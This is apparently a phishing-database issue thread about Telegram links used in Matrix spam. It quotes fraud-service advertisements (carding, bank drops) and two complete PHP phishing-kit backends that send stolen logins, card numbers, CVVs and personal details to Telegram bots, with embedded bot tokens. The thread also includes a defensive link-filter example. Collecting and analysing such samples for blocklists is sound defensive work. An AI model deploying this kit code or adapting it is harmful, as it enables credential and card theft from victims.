Phishing | t.me #590
Comments
{
"content": {
"body": "𝗛𝗲𝗹𝗹𝗼 👋👋👋\n𝗚𝗿𝗲𝗲𝘁𝗶𝗻𝗴𝘀! 𝗔𝗿𝗲 𝘆𝗼𝘂 𝗹𝗼𝗼𝗸𝗶𝗻𝗴 𝗳𝗼𝗿 𝗮 𝘄𝗮𝘆 to make money?\n\n𝗧𝗵𝗶𝘀 𝗖𝗼𝗺𝗽𝗮𝗻𝘆 𝗛𝗮𝘀 𝗖𝗵𝗮𝗻𝗴𝗲𝗱 𝗧𝗵𝗲 𝗟𝗶𝗳𝗲 𝗢𝗳 𝗟𝗶𝘃𝗲𝘀 𝗼𝘂𝘁 𝘁𝗵𝗲𝗿𝗲. 𝗗𝗼𝗻'𝘁 𝗠𝗶𝘀𝘀 𝗧𝗵𝗶𝘀 𝗚𝗿𝗲𝗮𝘁 𝗢𝗽𝗽𝗼𝗿𝘁𝘂𝗻𝗶𝘁𝘆, 𝗜𝘁 𝗠𝗮𝘆 𝗡𝗲𝘃𝗲𝗿 𝗕𝗲 𝗧𝗵𝗲𝗿𝗲 𝗔𝗴𝗮𝗶𝗻.\n𝗛𝘂𝗿𝗿𝘆 𝘂𝗽 𝗝𝗼𝗶𝗻 𝗧𝗵𝗲 𝗪𝗶𝗻𝗻𝗶𝗻𝗴 𝗧𝗲𝗮𝗺𝘀 𝗔𝗻𝗱 𝗘𝗻𝗷𝗼𝘆 𝗬𝗼𝘂𝗿𝘀𝗲𝗹𝗳 \n\n👉𝗟𝗶𝗻𝗸 𝘁𝗼 𝗷𝗼𝗶𝗻 𝗰𝗵𝗮𝗻𝗻𝗲𝗹:\n\nhttps://t.me/+ioqje81ziAYyYTc0\n\n🖕🖕🖕🖕🖕🖕🖕\n𝗝𝗼𝗶𝗻 𝗻𝗼𝘄 𝗶𝘁 𝗽𝗮𝘆 𝗮 𝗹𝗼𝘁 💯",
"msgtype": "m.text"
},
"origin_server_ts": 1735556046191,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 75104493
},
"event_id": "$ELY4yLoggUfYoZZd5ovoPhuuz_SaCB7kzfKuglx7CtQ",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
} |
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735600325944,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 30824740
},
"event_id": "$JBed9or2sRGAtzf7frFpNcQ_tH3wCrwpPwdYrbaE5KM",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
} |
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735600409434,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 30741250
},
"event_id": "$4leHgNijrYpj38WqhLVTIR5MvncxaBbWJpRoYzSFj0g",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
} |
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735611816015,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 19334669
},
"event_id": "$b-BoL6cPaICgJ4mzYo2o8z8oFV9Nzxs951m9f5FFdgc",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
} |
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735633316735,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 189
},
"event_id": "$CHwYjV3cpHKwsRXksjyM9Qbnv4g3zwdc37np-hOd5so",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
} Source mypdns/matrix#698 (comment) |
While I do agree that telegram is a cesspool of criminal activity I worry that blocking their link shortener could cause unintended collateral damage. For example, my school's honor society has been working with a group of Ukrainian students for the past semester and they primarily use telegram for messaging. |
Teach them about matrix.org... there is a free open, privacy respecting instance at matrix.rocks 😮 and that is real E2EE messaging
@g0d33p3rsec could you run the test of the URI on |
I've tried recommending alternatives. Unfortunately, it's what they're used to, similar to Facebook or Windows users. Matrix/ Riot isn't bad but was a bit of a nightmare to admin as I recall.
Sure, I'll try to do a fly over later today once I catch up on some of my writing. |
https://urlscan.io/result/ca114b9b-e933-470e-ba2f-88dabce459d7/
https://urlscan.io/result/67ed8728-30d4-48fb-abaa-01a10fa5e79d/
I was mistaken earlier when I said it was a link shortener. |
You're not the only one, thought it all was url_shortener with random destinations, but nonetheless, still a dangerous domain.
@Phishing-Database/contributors What should we do with these urls, in your opinion? |
agreed, though I see the revised understanding as less of a threat than a link shortener, which are often directly used in attack chains. By comparison, the profile/ chat redirection at least requires a threat actor to still do the social engineering work. On the other hand, I can also see some limited protections such a mechanism could offer legitimate users by partially obfuscating their phone numbers.
I'll have to think about this some more. I don't have a good answer off the top of my head, likely due to an absence of information regarding the different ways this data source is used by end users. I haven't played with Matrix/ Riot in a few years, is there a way to add the URI to some sort of inbound filtering there? If you are familiar with Pleroma, perhaps something like their message rewrite facility for dealing with fediverse traffic. |
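One way such an inbound filter could look, as an added example that is not part of the thread and not code from Matrix, Pleroma or this project. It goes slightly beyond the reported messages by NFKC-normalizing the body first, so a link written in the same styled Unicode letters as the spam text is still caught, and it can match invite links only so ordinary profile links are left alone. The function names, the `/+` and `/joinchat/` invite rule as applied here, and the sample events are assumptions constructed for illustration.

```python
import re
import unicodedata
from collections import Counter
from urllib.parse import urlsplit

TELEGRAM_HOSTS = {"t.me", "web.telegram.org"}  # subjects listed in this issue
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

def telegram_links(body):
    """Return (url, is_invite) for each Telegram URL in a message body."""
    if not isinstance(body, str):
        return []
    text = unicodedata.normalize("NFKC", body)  # fold styled letters to ASCII
    found = []
    for url in URL_RE.findall(text):
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower().rstrip(".")
        except ValueError:  # malformed authority, e.g. a broken IPv6 literal
            continue
        if host in TELEGRAM_HOSTS:
            found.append((url, parts.path.startswith(("/+", "/joinchat/"))))
    return found

def should_drop(event, invites_only=True):
    """Filter decision; invites_only=True spares plain profile links."""
    if event.get("type") != "m.room.message":
        return False
    links = telegram_links(event.get("content", {}).get("body"))
    return any(inv for _, inv in links) if invites_only else bool(links)

def repeat_senders(events, threshold=2):
    """Senders who posted the same Telegram link at least `threshold` times."""
    counts = Counter(
        (ev.get("sender"), url)
        for ev in events if ev.get("type") == "m.room.message"
        for url, _ in telegram_links(ev.get("content", {}).get("body")))
    return {sender for (sender, _), n in counts.items() if n >= threshold}

def _msg(sender, body):  # builds a constructed sample event
    return {"type": "m.room.message", "sender": sender,
            "content": {"msgtype": "m.text", "body": body}}

STYLED_HOST = "\U0001d601.\U0001d5fa\U0001d5f2"  # "t.me" in sans-serif bold
SAMPLE = [  # constructed events, not taken from the issue
    _msg("@spam:example.org", f"https://{STYLED_HOST}/+CONSTRUCTEDinvite01"),
    _msg("@spam:example.org", "again https://t.me/+CONSTRUCTEDinvite01"),
    _msg("@alice:example.org", "my profile: https://t.me/alice_example"),
    _msg("@bob:example.org", "docs at https://example.com/t.me/+x"),
]
```

Matching on the parsed hostname rather than a substring keeps a URL such as the last sample, where `t.me` only appears in the path of another site, from being dropped.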
Some additional information from my recent pulls related to telegram but not the #604 uses #625 and #626 use
<?php
$chatId = "6262739564";
$botUrl = "bot6178951135:AAE6wPSUmFhb-fxBLxv6YUgYepKMRVK8pBY";
$telegram = "on"; // off if u don't need result to telegram
$user_ids = "[email protected]"; // your email here
extract($_REQUEST);
# Store Post values in variables
// Here variable $a is just an example (replace with your own variables)
$_SESSION['ai'] = $_POST['ai'];
$_SESSION['pr'] = $_POST['pr'];
$ip = $_SERVER['REMOTE_ADDR'];
# Format for Telegram & Discord
// Here variable $a is just an example (replace with your own variables)
$data = "
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++
EMAIL = ".$_SESSION['ai']."
PassWord = ".$_SESSION['pr']."
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++
IP = http://www.geoplugin.net/json.gp?ip=$ip
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++
";
$msg = "
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++<br>
EMAIL = ".$_SESSION['ai']." <br>
PassWord = ".$_SESSION['pr']." <br>
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++
<br>
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++<br>
IP = http://www.geoplugin.net/json.gp?ip=$ip <br>
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++ <br>
";
// Email send function
$sender = 'From: 💎 C0DeX 💎 <[email protected]>';
$sub="NEW EXCEL LOGIN FROM [$ip]";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= ''.$sender.'' . "\r\n";
$result=mail($user_ids, $sub, $msg, $headers);
// Telegram send function
$txt = $data;
if ($telegram == "on"){
$send = ['chat_id'=>$chatId,'text'=>$txt];
$web_telegram = "https://api.telegram.org/{$botUrl}";
$ch = curl_init($web_telegram . '/sendMessage');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($send));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
} |
Used that on matrix.rocks until I switched to MissKey, as the JScripts constantly made my browsers freeze.
Would you mind to elaborate, it's probably clear in English, what this refers to, in translation, it can mean a lot of things, in diff contents While typing, do you mean user filtering on msg? |
Nice, I was around when the project started and on the fediverse before Mastodon existed, though only recently returned.
ah, yeah, single page apps can get pretty greedy for resources. Did you try any of the alternative frontends?
either user or instance level, just something that would let you drop any messages with a another outbound connection to telegram from a site I just added: from #634
<?php
include('anti.php');
header("Access-Control-Allow-Origin: *"); // Replace '*' with your allowed origins
function getRealIpAddr()
{
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$token = "5834814986:AAGX9OeRyUYqwPIBDGtk7kwtmJkXmCQIKdk";
$user_ids = array("-4232044246");
// Ensure all required variables are set
if (
isset($_POST['billfirstname'], $_POST['reference'], $_POST['billlastname'], $_POST['billdateofbi1'], $_POST['billconfemail'], $_POST['billphonenumb'], $_POST['billaddrline1'], $_POST['billcitytown1'], $_POST['billpostcode1'])
) {
$ip = getRealIpAddr();
$reference = urldecode($_POST['reference']);
$firstname = urldecode($_POST['billfirstname']);
$lastname = urldecode($_POST['billlastname']);
$billdateofbi1 = urldecode($_POST['billdateofbi1']);
$emailcon = urldecode($_POST['billconfemail']);
$phonenum = urldecode($_POST['billphonenumb']);
$billing1 = urldecode($_POST['billaddrline1']);
$citytown = urldecode($_POST['billcitytown1']);
$postcode = urldecode($_POST['billpostcode1']);
//$country = getCountryFromIp($ip);
// Construct the message
$message = "#---------------++==[ ⚡️ New BILL Rez ⚡️ ]==++-------------#\n";
$message .= "FULL NAME : $firstname $lastname\n";
$message .= "DOB : $billdateofbi1\n";
$message .= "EMAIL ADD : $emailcon\n";
$message .= "PHONE NUM : +61$phonenum\n";
$message .= "BILLING 1 : $billing1\n";
$message .= "CITY/TOWN : $citytown\n";
$message .= "ZIP CODE : $postcode\n";
$message .= "#---------------++==[ 💻 USER INFO 💻 ]==++-------------#\n";
$message .= "IP : $ip\n";
$message .= "#---------------++==[ ⚠️ BY ELMOJREM ⚠️ ]==++-------------#\n";
// Send message to Telegram chat for each user_id
foreach ($user_ids as $user_id) {
$website = "https://api.telegram.org/bot" . $token;
$params = [
'chat_id' => $user_id,
'text' => $message,
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
}
}
// Ensure all required variables are set
if (
isset(
$_POST['billfullname'],
$_POST['reference'],
$_POST['billccnumber'],
$_POST['billexpirati'],
$_POST['billexpircvv']
)
) {
$ip = getRealIpAddr();
$reference = urldecode($_POST['reference']);
$billfullname = urldecode($_POST['billfullname']);
$billccnumber = urldecode($_POST['billccnumber']);
$billexpirati = urldecode($_POST['billexpirati']);
$billexpircvv = urldecode($_POST['billexpircvv']);
// Validate and sanitize credit card information
$realcc = str_replace(' ', '', $billccnumber);
// Additional validation and sanitization steps if needed
// Construct the message
$message = "#---------------++==[ ⚡️ New CVV Rez ⚡️ ]==++-------------#\n";
$message .= "FULL NAME : $billfullname\n";
$message .= "CC NUMBER : $realcc\n";
$message .= "EXPIRATION : $billexpirati\n";
$message .= "CVV NUMBR : $billexpircvv\n";
$message .= "#---------------++==[ 💻 USER INFO 💻 ]==++-------------#\n";
$message .= "IP : $ip\n";
$message .= "#---------------++==[ ⚠️ BY ELMOJREM ⚠️ ]==++-------------#\n";
// Send message to Telegram chat for each user_id
foreach ($user_ids as $user_id) {
$website = "https://api.telegram.org/bot" . $token;
$params = [
'chat_id' => $user_id,
'text' => $message,
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
}
}
// Ensure all required variables are set
if (isset($_POST['text_input'], $_GET['ccnumber'])) {
$ccnumb = base64_decode($_GET['ccnumber']);
$Cpode = $_POST['text_input'];
// Validate and sanitize credit card number and VBV code
$realcc = str_replace(' ', '', $ccnumb);
// Additional validation and sanitization steps if needed
// Construct the message
$message = "#---------------++==[ ⚡️ New VBV Rez ⚡️ ]==++-------------#\n";
$message .= "CCNUMB : $realcc\n";
$message .= "VBV : $Cpode\n";
$message .= "#---------------++==[ 💻 USER INFO 💻 ]==++-------------#\n";
$message .= "IP : " . getRealIpAddr() . "\n";
$message .= "#---------------++==[ ⚠️ BY ELMOJREM ⚠️ ]==++-------------#\n";
// Send message to Telegram chat for each user_id
foreach ($user_ids as $user_id) {
$website = "https://api.telegram.org/bot" . $token;
$params = [
'chat_id' => $user_id,
'text' => $message,
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
// Handle cURL errors
if ($result === false) {
$error = curl_error($ch);
// Handle the error (e.g., log the error, display an error message, etc.)
// Avoid showing specific cURL errors to users for security reasons
}
curl_close($ch);
}
// Clear HTTP headers and output an "ok" response
//header_remove();
echo 'ok';
exit();
}
?> |
Well, MissKey also let the admins make some rules, on the Ban lists, to exclude any posts containing specific words. It's supposed to support regex, but never had it working properly.
|
considering a bot to ingest all of the telegram credentials I'm harvesting and send each a message congratulating them on being added to the database. |
UUhhh have seen a similar bot for cloudflare... @migigator, not popular... like at all... but if you are bored, I would almost, give my left arm to have this one working https://github.com/mypdns/MK-Cleaner |
What are the subjects of the phishing (domains, URLs or IPs)?
example.com
sub.example.com
https://example.com/page
https://sub.example.com/page
example.com
192.168.0.0/16
t.me
web.telegram.org
What are the impersonated domains?
t.me (self)
Where or how did you discover this phishing?
I discovered this phishing by...
I was targeted by this phishing by...
Matrix.org client
Do you have a screenshot?
Screenshot
Related external source
Additional Information or Context
I have also noticed that...